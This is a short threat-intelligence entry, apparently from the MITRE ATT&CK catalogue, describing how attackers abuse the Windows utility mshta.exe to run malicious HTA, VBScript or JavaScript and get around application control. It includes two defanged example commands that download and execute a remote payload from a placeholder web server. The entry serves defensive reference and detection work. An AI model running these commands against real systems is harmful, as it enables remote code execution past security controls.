T1218.005

Sub-technique Windows
Mshta

Description

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files.

HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code> They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code> Mshta.exe can be used to bypass application control solutions that do not account for its potential use.

Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.